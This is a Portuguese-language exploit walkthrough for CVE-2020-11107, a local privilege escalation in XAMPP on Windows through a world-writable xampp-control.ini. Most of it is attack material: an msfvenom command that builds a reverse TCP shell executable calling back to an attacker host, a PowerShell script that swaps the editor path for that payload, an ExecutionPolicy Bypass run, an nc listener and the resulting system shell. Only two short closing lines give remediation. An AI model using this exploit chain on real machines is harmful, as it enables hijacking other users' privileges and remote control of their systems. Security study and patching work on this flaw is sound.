
CVE-2020-11107-Local-Privilege-Escalation-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4
CVE-2020-11107 é uma vulnerabilidade de Escalação Local de Privilégios (LPE) que afeta o Apache Friends XAMPP no Windows.
Um usuário sem privilégios pode modificar o arquivo de configuração do Painel de Controle do XAMPP (xampp-control.ini) e substituir o executável do editor padrão (notepad.exe) por um executável malicioso.
Quando outro usuário (ex.: Administrador) abre logs por meio do Painel de Controle, o binário malicioso é executado com os privilégios da vítima, resultando em escalação de privilégios.
❗ Esta vulnerabilidade NÃO afeta Linux ou macOS.
xampp-control.ini é gravável globalmenteC:\xampp\xampp-control.ini
C:\xampp\xampp-control.exe
Verifique a versão do XAMPP:
type C:\xampp\properties.ini
Exemplo de saída:
base_stack_version=7.3.10-1
base_stack_platform=windows-x64
✅ A versão é vulnerável.
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.xxx.xxx LPORT=4444 \
-f exe -o msf.exe
mkdir C:\temp
# Upload msf.exe into C:\temp
Script de exploit (PowerShell):
# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file
Execute o script:
powershell -ExecutionPolicy Bypass -File 50337.ps1
A vítima executa:
C:\xampp\xampp-control.exe
Em seguida, abre qualquer arquivo de log pelo Painel de Controle.
nc -lvnp 4444
✅ Resultado:
Connection received...
C:\WINDOWS\system32>
🎉 Escalação de Privilégios Bem-sucedida
Atualize o XAMPP para uma das seguintes versões (ou mais recentes):
Restrinja as permissões em:
C:\xampp\xampp-control.ini